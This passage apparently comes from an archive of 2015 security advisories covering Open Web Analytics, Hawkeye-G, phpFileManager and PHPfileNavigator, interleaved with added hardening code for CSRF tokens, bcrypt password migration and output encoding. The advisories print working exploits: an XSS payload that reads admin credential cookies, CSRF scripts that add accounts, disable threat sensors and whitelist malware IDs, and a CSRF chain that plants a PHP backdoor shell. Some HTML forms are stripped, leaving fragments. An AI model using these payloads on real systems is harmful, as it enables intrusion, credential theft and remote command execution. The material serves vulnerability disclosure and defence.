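foreach ($cases as [$srv, $get, $post]) {
    echo dispatch($srv, $get, $post, $session), "\n";
}
```

Expect the first two requests to be refused and only the third to be accepted. The token check is what protects older browsers and any endpoint reachable by POST from a third-party page; the SameSite attribute is defence in depth rather than a replacement, since it depends on browser support and on the cookie never being needed in a legitimate cross-site navigation.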


Open-Web-Analytics-1.5.7 Cryptographic, Password Disclosure & XSS Vulnerabilities

2015-07-22 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-OPENWEBANALYTICS0721.txt



Vendor:

www.openwebanalytics.com



Product:

Open-Web-Analytics-1.5.7


Advisory Information:
===
Cryptographic, Password Disclosure & XSS Vulnerabilities




Vulnerability Details:
=


Cryptographic Weakness:
---
Passwords are stored in the database using the MD5 hash algorithm, non-salted;
we find in owa_lib.php:

public static function encryptPassword($password) { 
 return md5(strtolower($password).strlen($password));
}


Password Disclosure:

In owa_auth.php on line 329 we find the saveCredentials() PHP function, which
saves the username & password as a browser domain cookie, leaving us direct
access via XSS attack.

function saveCredentials() {
  $this->e->debug('saving user credentials to cookies');
  setcookie($this->config['ns'].'u', $this->u->get('user_id'), 
time()+3600*24*365*10, '/', $this->config['cookie_domain']);
  setcookie($this->config['ns'].'p', $this->u->get('password'), 
time()+3600*24*30, '/', $this->config['cookie_domain']);
}



XSS:

The application is vulnerable to XSS. So, now we can access the Admin username &
password credentials from our XSS attack, do a window.open() or whatever and
send them to a remote server, then come back and login after performing an
offline crack of the hash. Since we cannot seem to echo the password using
document.cookie we will use window.document['cookie'] to gain access to the
admin password. The application uses the admin username and password as
persistent browser cookies, which is our dream come true!

e.g. retrieved username & passwd via XSS ( owa_u=admin;
owa_p=76ffbb8d470d6a402b3c429f35be8a1a )
user: admin / passwd: abc123


Also a second XSS vector exists in Install PHP script via POST request in the 
Email address field.


Exploit code(s):



XSS(s) POC:

1- Steal username & password XSS, in this example we inject our malicious 
payload into the middle of the site ID hash.
http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/index.php?owa_do=base.sitesInvocation&owa_siteId=e9144cf4%22/%3E%22--%3E%3CDIV%20id=%27HELL%27%20onMouseMove=alert%28window.document[%27cookie%27]%29;%3C!--

Injecting 
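The two storage problems this post describes, an unsalted, case-folded MD5 of the password and a ten-year cookie carrying that hash, as an added example that is not Open Web Analytics code. It keeps a copy of the quoted encryptPassword() logic only to verify legacy rows, replaces it with password_hash()/password_verify() (salted bcrypt by default, upgraded transparently on the next successful login), and replaces the credential cookie with an opaque, HttpOnly session identifier so nothing readable by document.cookie or window.document['cookie'] reveals a credential. Function names, the cookie name and the session identifier are assumptions for the illustration.

```php
<?php
// Added example (not Open Web Analytics code): replacing an unsalted MD5
// password hash and a password-carrying cookie. Names are assumptions.

// Equivalent of the quoted encryptPassword(): deterministic, unsalted and
// case-folded, so equal passwords give equal hashes and a plain MD5 wordlist
// cracks them offline. Kept only to verify rows that still hold this format.
function legacy_hash(string $password): string
{
    return md5(strtolower($password) . strlen($password));
}

// Hardened: salted, deliberately slow, per-user hash. password_hash() draws the
// salt itself and embeds algorithm, cost and salt in the returned string.
function hash_password(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

// Verify against the stored value and upgrade legacy entries on a successful
// login, so no forced reset is needed. Returns the hash to store (possibly a
// new one), or null when the password is wrong.
function verify_and_upgrade(string $password, string $stored): ?string
{
    $info = password_get_info($stored);
    if ($info['algo'] === null || $info['algo'] === 0) {
        // Not a password_hash() output: treat it as a legacy MD5 entry.
        if (!hash_equals($stored, legacy_hash($password))) {
            return null;
        }
        return hash_password($password);           // upgrade in place
    }
    if (!password_verify($password, $stored)) {
        return null;
    }
    // Re-hash if the default cost has been raised since this hash was made.
    return password_needs_rehash($stored, PASSWORD_DEFAULT) ? hash_password($password) : $stored;
}

// Instead of setcookie(ns.'p', <password hash>, ten years): persist only an
// opaque server-side session identifier. HttpOnly keeps document.cookie and
// window.document['cookie'] from reading it in an XSS; Secure keeps it off
// plaintext HTTP; no long expiry means no ten-year credential on disk.
function issue_session_cookie(string $name, string $sessionId, string $domain): void
{
    setcookie($name, $sessionId, [
        'expires'  => 0,
        'path'     => '/',
        'domain'   => $domain,
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed demo with the password quoted in the advisory. The legacy value
// can be compared against the owa_p cookie value quoted above.
$legacy   = legacy_hash('abc123');
$upgraded = verify_and_upgrade('abc123', $legacy);     // correct password: bcrypt hash replaces MD5
$again    = verify_and_upgrade('abc123', $upgraded);   // second login verifies the bcrypt hash
$wrong    = verify_and_upgrade('abc124', $upgraded);   // wrong password: null

echo "legacy  : $legacy\n";
echo "upgraded: $upgraded\n";
echo "again   : " . ($again !== null ? 'login ok' : 'login failed') . "\n";
echo "wrong   : " . ($wrong !== null ? 'login ok' : 'login failed') . "\n";
```

The migration path matters as much as the algorithm: stored MD5 values are recognised because password_get_info() reports no known algorithm for them, verified once with the legacy function, and overwritten with a bcrypt hash, so the weak format disappears from the database as users log in.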

Hawkeye-G v3.0.1.4912 CSRF Vulnerability CVE-2015-2878

2015-07-24 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt


Vulnerability Type:
===
CSRF


CVE Reference:
==
CVE-2015-2878



Vendor:
===
www.hexiscyber.com



Product:
=
Hawkeye-G v3.0.1.4912

Hawkeye G is an active defense disruptive technology that detects,
investigates, remediates and removes cyber threats within the network.



Advisory Information:


Multiple CSRF(s) Vulnerabilities:


Vulnerability Details:
=

1- CSRF Add arbitrary accounts to system


vulnerable URL:
https://localhost:8443/interface/rest/accounts/json

vulnerable POST parameter:
'name'

  
2- CSRF modification of network sensor settings
-

a) Turn off 'Url matching' Sensor
b) Turn off 'DNS Inject' Sensor
c) Turn off 'IP Redirect' Sensor
  
vulnerable URL:
https://localhost:8443/interface/rest/dpi/setEnabled/1

vulnerable POST parameters:
'url_match'
'dns_inject'
'ip_redirect'

3- CSRF whitelisting of malware MD5 hash IDs
--

vulnerable URL:
https://localhost:8443/interface/rest/md5-threats/whitelist

vulnerable POST parameter 'id'



CSRF Exploit code(s):








/* Execute consecutive CSRF exploits */

function ghostofsin(){
 var doc=document;
 var e1=doc.getElementById('exploit_1')
 e1.submit()
 var e2=doc.getElementById('exploit_2')
  e2.submit()
 var e3=doc.getElementById('exploit_3')
  e3.submit()
 var e4=doc.getElementById('exploit_4')
  e4.submit()
}





https://localhost:8443/interface/rest/accounts/json"; method="post">





 




https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">



 



https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">



 



https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">



 





Whitelist MD5 malware IDs CSRF:
---

The final CSRF POC, to try and whitelist malware MD5 IDs, will be a bit more
complex; we need to submit the form many times hidden in the background using
an iframe so we stay on the same page. It seems all MD5 IDs end in 0001 and are
8 bytes in length; we just need a loop to create some numbers 8 bytes long,
dynamically assign the 'id' value of the field and execute multiple POST
requests in the background. It will be hit or miss unless you know ahead of
time the MD5 ID in the database you're targeting.

e.g. Malware MD5 database ID 28240001

So Here we go!...



http://www.w3.org/TR/html4/loose.dtd";>


CSRF POC hyp3rlinx



https://localhost:8443/interface/rest/md5-threats/whitelist"; 
target="demonica" method="post">


 

var doc=document
var x=1000
function exorcism(){
  x++
  x=x+001 
  x=String(x)
 var f=doc.getElementById('hell')
 var e=doc.getElementById('id')
 e.value=x
 f.submit()
 }
 setInterval("exorcism()",100)






Disclosure Timeline:
=
Vendor Notification: June 30, 2015
July 24, 2015 : Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s):  [+] POST


Vulnerable Product: [+] Hawkeye-G v3.0.1.4912


Vulnerable Parameter(s):[+] name, enable, id


Affected Area(s):   [+] Network Threat Appliance, Local Domain






(hyp3rlinx)


Hawkeye-G v3 CSRF Vulnerability ***[UPDATED CORRECTED]

2015-07-24 Thread apparitionsec
***[UPDATED CORRECTION] ***

[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt


Vulnerability Type:
===
CSRF


CVE Reference:
==
CVE-2015-2878



Vendor:
===
www.hexiscyber.com



Product:
=
Hawkeye-G v3.0.1.4912

Hawkeye G is an active defense disruptive technology that detects,
investigates, remediates and removes cyber threats within the network.



Advisory Information:


Multiple CSRF(s) Vulnerabilities:


Vulnerability Details:
=

1- CSRF Add arbitrary accounts to system


vulnerable URL:
https://localhost:8443/interface/rest/accounts/json

vulnerable POST parameter:
'name'

  
2- CSRF modification of network sensor settings
-

a) Turn off 'Url matching' Sensor
b) Turn off 'DNS Inject' Sensor
c) Turn off 'IP Redirect' Sensor
  
vulnerable URL:
https://localhost:8443/interface/rest/dpi/setEnabled/1

vulnerable POST parameters:
'url_match'
'dns_inject'
'ip_redirect'

3- CSRF whitelisting of malware MD5 hash IDs
--

vulnerable URL:
https://localhost:8443/interface/rest/md5-threats/whitelist

vulnerable POST parameter 'id'



CSRF Exploit code(s):








/* Execute consecutive CSRF exploits */

function ghostofsin(){
 var doc=document;
 var e1=doc.getElementById('exploit_1')
 e1.submit()
 var e2=doc.getElementById('exploit_2')
  e2.submit()
 var e3=doc.getElementById('exploit_3')
  e3.submit()
 var e4=doc.getElementById('exploit_4')
  e4.submit()
}





https://localhost:8443/interface/rest/accounts/json"; method="post">





 




https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">



 



https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">



 



https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">



 





Whitelist MD5 malware IDs CSRF:
---

The final CSRF POC, to try and whitelist malware MD5 IDs, will be a bit more
complex; we need to submit the form many times hidden in the background using
an iframe so we stay on the same page. It seems all MD5 IDs end in 0001 and are
8 bytes in length; we just need a loop to create some numbers 8 bytes long,
dynamically assign the 'id' value of the field and execute multiple POST
requests in the background. It will be hit or miss unless you know ahead of
time the MD5 ID in the database you're targeting.

e.g. Malware MD5 database ID 28240001

So Here we go!...



http://www.w3.org/TR/html4/loose.dtd";>


CSRF POC hyp3rlinx



https://localhost:8443/interface/rest/md5-threats/whitelist"; 
target="demonica" method="post">


 

var doc=document
var x=1000
exorcism()
function exorcism(){
 x++
 String(x)
 x+="0001" 
 var f=doc.getElementById('hell')
 var e=doc.getElementById('id')
 e.value=x
  x=x.substr(0,4)
 f.submit()
 }
 setInterval("exorcism()",100)






Disclosure Timeline:
=
Vendor Notification: June 30, 2015
July 24, 2015 : Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s):  [+] POST


Vulnerable Product: [+] Hawkeye-G v3.0.1.4912


Vulnerable Parameter(s):[+] name, enable, id


Affected Area(s):   [+] Network Threat Appliance, Local Domain






(hyp3rlinx)


Hawkeye-G v3.0.1 Persistent XSS & Information Leakage

2015-07-27 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0725.txt



Vendor:

www.hexiscyber.com



Product:

Hawkeye-G v3.0.1.4912

Hawkeye G is an active defense disruptive technology that
detects, investigates, remediates and removes cyber threats
within the network.



Vulnerability Type:
=
Persistent XSS & Server Information Leakage


CVE Reference:
==
N/A



Advisory Information:
=

Persistent XSS:
---

Hexis cyber Hawkeye-G network threat appliance is vulnerable to
persistent XSS injection when adding device accounts to the system.
The appliance contains an endpoint sensor that collects client
information to report back to the Hawkeye-G web interface.

When adding device accounts to the system, XSS payloads supplied to the
vulnerable id parameter 'name' will be stored in the database and executed
each time certain threat appliance webpages are visited.


Server Information Disclosure:
-

We can force internal server 500 errors that leak back-end information.
Stack traces are echoed out to the end user instead of being suppressed;
this can give attackers valuable information into the system internals,
possibly helping attackers in crafting more specific types of attacks.



Exploit code(s):
===

Persistent XSS:
---

https://localhost:8443/interface/rest/accounts/json"; 
method="post">





 

Accessing the URL will execute the malicious XSS stored in the Hawkeye-G backend database.
https://localhost:8443/interface/app/#/account-management

vulnerable parameter: 
'name'




Server Information Leakage:
---

These examples will result in 500 internal server error info disclosures:

1- 
https://localhost:8443/interface/rest/threatfeeds/pagedJson?namePattern=&page=0&size=25&sortCol=address&sortDir=%22/%3E%3Cscript%3Ealert%280%29%3C/script%3E

2- 
https://localhost:8443/interface/rest/mitigationWhitelist/paged?namePattern=WEB-INF/web.xml&page=0&size=0&source-filter=



Disclosure Timeline:
=


Vendor Notification: June 30, 2015
July 25, 2015 : Public Disclosure



Severity Level:
=
High



Description:
==


Request Method(s):[+] POST & GET


Vulnerable Product:   [+] Hawkeye-G v3.0.1.4912


Vulnerable Parameter(s):  [+] name, namePattern, sortDir


Affected Area(s): [+] Network Threat Appliance


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author. The author is not 
responsible for any misuse of the information contained herein and prohibits 
any malicious use of all security related information or exploits by the author 
or elsewhere.

by hyp3rlinx


phpFileManager 0.9.8 CSRF Backdoor Shell Vulnerability

2015-07-29 Thread apparitionsec
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0729.txt



Vendor:

phpfm.sourceforge.net



Product:

phpFileManager version 0.9.8


Vulnerability Type:
==
CSRF Remote Backdoor Shell



CVE Reference:
==
N/A



Advisory Information:

CSRF Remote Backdoor Shell Vulnerability




Vulnerability Details:
===
PHP File Manager is vulnerable to creation of arbitrary files on the server
via CSRF, which we can use to create remote backdoor shell access if the victim
clicks our malicious links or visits our malicious webpages.

To create the backdoor shell we need to execute two POST requests:
1- create the PHP backdoor shell 666.php
2- inject code and save it to the backdoor we just created

e.g.
https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ] 


Exploit code(s):
===


// First POST: create the empty file 666.php
var scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)

// Second POST: save file contents into the file just created
var maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='"
blasphemer(maliciouso)

function blasphemer(payload){
 var xhr=new XMLHttpRequest()
 xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
 xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
 xhr.send(payload)
}




Disclosure Timeline:
=
Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure



Severity Level:
=
High



Description:
==


Request Method(s):  [+] POST


Vulnerable Product: [+] phpFileManager 0.9.8


Vulnerable Parameter(s):[+] action, cmd_arg, file_data, chmod_arg, 
save_file


Affected Area(s):   [+] Web Server


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


PHPfileNavigator 2.3.3 Persistent & Reflected XSS

2015-08-12 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt



Vendor:

pfn.sourceforge.net



Product:
===
PHPfileNavigator v2.3.3 (pfn)

It is a state-of-the-art, open source, web-based application
to completely manage your files and folders.



Vulnerability Type:
=
Persistent & Reflected XSS



CVE Reference:
==
N/A




Vulnerability Details:
=
Multiple persistent XSS vulnerable fields exist on the 'Modify User' form:
nome, usuario, email etc.

We can leverage an existing CSRF vulnerability to update a victim's profile and
store a malicious XSS payload, or a malicious user can inject their own payloads
when updating their profile, affecting other users and the security of the
whole application.

Multiple reflected XSS exist as well for the following PHP pages, all with the
same vulnerable parameter 'dir' when issuing GET requests.
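Both this advisory's stored ('Modify User' fields) and reflected ('dir') cases and the Hawkeye-G stored 'name' case earlier on the page share one fix: encode the untrusted value for the output context it lands in, rather than filtering tags on the way in. The following is an added example, not code from the pfn project, Hexis or the advisory author; the account-row and link templates are assumptions, and the sample payload is the decoded `sortDir` value from the Hawkeye-G information-leak URL.

```javascript
// Added example, not code from pfn, Hexis or the advisory author.
// Contextual output encoding for untrusted values: the stored 'name' and the
// reflected 'dir' parameter are both rendered through an encoder chosen for
// the output context. Row and link templates are assumptions for the demo.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encoder for HTML text nodes and double-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Encoder for a value placed inside a URL query string.
function escapeUrlParam(value) {
  return encodeURIComponent(String(value));
}

// Stored-XSS case: an account record read back from the database and
// placed into an account-management table.
function renderAccountRow(account) {
  return '<tr><td>' + escapeHtml(account.name) + '</td><td>' + escapeHtml(account.id) + '</td></tr>';
}

// Reflected-XSS case: a 'dir' query parameter echoed into both a link
// attribute and the link text. The URL context is encoded first, then the
// whole attribute value is HTML-encoded for the attribute context.
function renderDirLink(dir) {
  const href = '/index.php?dir=' + escapeUrlParam(dir);
  return '<a href="' + escapeHtml(href) + '">' + escapeHtml(dir) + '</a>';
}

// Regression check for templates: an untrusted string containing markup
// characters must never reach the output verbatim.
function leaksMarkup(html, untrusted) {
  return /[<>"']/.test(untrusted) && html.includes(untrusted);
}

// Constructed sample input: the decoded sortDir value from the advisory's
// first information-leak URL, stored as a constructed account name.
const SAMPLE_PAYLOAD = '"/><script>alert(0)</script>';
const SAMPLE_ACCOUNT = { id: 7, name: SAMPLE_PAYLOAD };

console.log(renderAccountRow(SAMPLE_ACCOUNT));
// <tr><td>&quot;/&gt;&lt;script&gt;alert(0)&lt;/script&gt;</td><td>7</td></tr>
console.log(renderDirLink(SAMPLE_PAYLOAD));
// <a href="/index.php?dir=%22%2F%3E%3Cscript%3Ealert(0)%3C%2Fscript%3E">&quot;/&gt;&lt;script&gt;alert(0)&lt;/script&gt;</a>
```

The point of `renderDirLink` is the double encoding order: URL-encode the parameter for the query string, then HTML-encode the whole attribute value; a tag blacklist applied to `dir` would protect neither context reliably, which is why the advisory's bypass exists at all.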

pfn-2.3.3 application seems to filter out  tags etc, but we can bypass 
this using
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID= e.g. Inject